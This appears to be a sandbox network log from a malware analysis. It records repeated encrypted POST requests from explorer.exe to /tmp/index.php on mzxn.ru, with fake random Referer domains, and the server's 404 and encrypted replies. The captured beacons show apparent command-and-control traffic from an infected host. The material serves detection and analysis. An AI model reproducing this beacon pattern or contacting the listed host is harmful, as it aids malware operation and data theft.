                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 217
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:35.543487072 CEST217OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 2d 41 e1 b5
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vu-AWOf`hmYr(slIz_>C'F,V4EHw2bZ|s].,696'v"
                          Aug 6, 2024 14:48:37.059124947 CEST484INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:36 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.44974358.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:37.067718983 CEST278OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://hlaxjpgxxibka.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 344
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:37.067754984 CEST344OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 3c 01 be fa
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vu<Nz{^m!O.Q+HN/~(BXl%0RNJr'@9z_+V1I.)"bsGH@O38
                          Aug 6, 2024 14:48:39.509258032 CEST137INHTTP/1.1 200 OK
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:39 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.44974458.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:39.517291069 CEST280OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://qxykcmjeqiqyjoi.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 265
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:39.517313004 CEST265OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 27 2e c1 bb
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vu'.?oNLtg.])N_u(T,\zo%PBvjE52M{<VruiS(@6PA.*FbtSi,Uf~K0t
                          Aug 6, 2024 14:48:41.820534945 CEST484INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:41 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.44974558.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:41.830480099 CEST279OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://vqtbeoidrbmewm.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 278
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:41.830612898 CEST278OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 35 2a b3 88
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vu5*r_zxX0dgE|oODh5bOR,45]YGR>g^6]vMn3pJ#QW9*|zH|b^fQ%L!
                          Aug 6, 2024 14:48:43.292944908 CEST484INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:42 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.44974658.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:43.306885958 CEST280OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://sowqaemgjxhutlr.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 177
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:43.306912899 CEST177OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 64 32 e6 e5
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vud2V>TXlZgpVAAfpNUp>:KZV>U8jrZ}b
                          Aug 6, 2024 14:48:44.854724884 CEST137INHTTP/1.1 200 OK
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:44 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.44974758.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:44.863045931 CEST276OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://qggmqqxdvbb.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 286
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:44.863070965 CEST286OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 72 53 ea f8
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vurS+eqya$n8pVs]jsR\cU*Zm;N}b~0ke+7cpz!5-0+yxWU$dJg<9]t
                          Aug 6, 2024 14:48:46.439511061 CEST137INHTTP/1.1 200 OK
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:46 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.44974858.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:46.450459003 CEST277OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://cypfufcosssb.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 246
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:46.450483084 CEST246OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 43 43 db 96
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vuCCMJw`Bu*rKV`tw1|H0{._kbVn!i_Su!Lw=agNPm^?Xd*!G
                          Aug 6, 2024 14:48:48.379570007 CEST484INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:48 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.44974958.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:48.388230085 CEST276OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://asulighvhvx.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 334
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:48.388256073 CEST334OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 3d 05 b4 e2
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vu=NQP}n5Dv7*q.G~:://&#VM=\$nXi))N22s\EPkUq"Xq2kh#6
                          Aug 6, 2024 14:48:50.165376902 CEST192INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:49 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 09 78 49 e3 2b 0f e9 ed 57 f7 9f f6 af 30 da 2d da f5 6c 58 00 85 86 8b 80 61 cc 3b
                          Data Ascii: #\6xI+W0-lXa;


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.44975258.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:53.607857943 CEST278OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://typuxgfkyjirf.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 136
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:53.607873917 CEST136OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 06 6b 2c 90 f4 76 0b 75 57 07 d6 a7
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA ,[k,vuWSl@e8wdz`aNZ'y
                          Aug 6, 2024 14:48:56.016000986 CEST484INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:55 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.44975358.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:56.027187109 CEST277OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://alapkefvafgo.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 135
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:56.027223110 CEST135OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 56 5c b5 98
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vuV\{_^R`2b=1dbp)\JF?
                          Aug 6, 2024 14:48:57.595113993 CEST206INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:57 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 e8 d5 7f e5 7c
                          Data Ascii: #\6U9H-anYp7vZW|


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.44975558.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:49:00.837105989 CEST280OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://yclxfxgmqbvjkhy.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 300
                          Host: mzxn.ru
                          Aug 6, 2024 14:49:00.837105989 CEST300OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 07 6b 2c 90 f4 76 0b 75 6c 3f d2 f7
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA ,[k,vul?SD`iXcSu0Ob7,mLcS1T%Zx8$KUG['3GrzS?04jny@jChjXW.[LWj
                          Aug 6, 2024 14:49:02.391630888 CEST484INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:49:02 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.44975658.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:49:02.414455891 CEST277OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://kiaaagbssjkd.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 204
                          Host: mzxn.ru
                          Aug 6, 2024 14:49:02.414470911 CEST204OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 3d 5b e4 90
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vu=[uZrD;+EBX(4em'p)r4SN1YB^Y2r%k<U\lq\G@
                          Aug 6, 2024 14:49:04.205972910 CEST484INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:49:03 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
